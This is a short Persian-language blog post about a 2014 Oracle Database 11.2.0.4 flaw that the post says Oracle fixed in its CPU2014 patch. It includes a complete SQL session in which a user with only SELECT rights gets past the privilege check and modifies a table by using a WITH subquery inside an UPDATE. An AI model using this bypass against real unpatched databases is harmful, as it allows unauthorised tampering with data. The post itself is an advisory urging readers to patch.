برطرف شدن باگ امنیتی در اوراکل دیتابیس نسخه 11.2.0.4

on .

سلام

در Augest سال 2014 یک باگ امنیتی در اوراکل دیتابیس شناسایی شد که کارشناسان اسم Monster BUG را روی آن گذاشتند.

و جالب است بدانید که این باگ تا آخرین ریلیز از نسخه 11g یعنی 11.2.0.4 نیز وجود دارد!!!

در تشریح این باگ بطور خلاصه: در صورتی که به کاربری در دیتابیس دسترسی Select برروی یکی از جداول خود را بدهید ، آن کاربر می تواند با روش زیر جدول مذکور را Update کند:

SQL> create user user1 identified by 123 ;
User created.
SQL> grant create session , create table to user1; Grant succeeded.
SQL> grant select on scott.emp to user1; Grant succeeded.
SQL> conn user1/123
Connected.

SQL> select ename , sal from scott.emp where ename='ALLEN'; ENAME SAL
---------- ----------
ALLEN 3600
1 rows selected.
SQL> update scott.emp set sal=1000 where ename='ALLEN';
update scott.emp set sal=1000 where ename='ALLEN'
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1000 where ename='ALLEN'; 1 row updated.
SQL> commit; Commit complete.
SQL> select ename , sal from scott.emp where ename='ALLEN'; ENAME SAL
---------- ----------
ALLEN 1000

خوشبختانه این مشکل با ارائه Critical Patch Update - CPU2014 توسط شرکت اوراکل برطرف شده است.

شما می توانید با مراجعه به بخش پشتیبانی اوراکل (Support.oracle.com) این patch را جستجو و پس از دانلود برروی دیتابیس خود نصب نمایید.لازم به توضیح است که برای دسترسی به این بخش از سایت اوراکل نیازمند اکانت MetaLink هستید و با کاربری که به طور معمول در اوراکل ایجاد می شود اجازه دسترسی به این بخش را نخواهید داشت.

 

موفق باشید
حمید قاسمی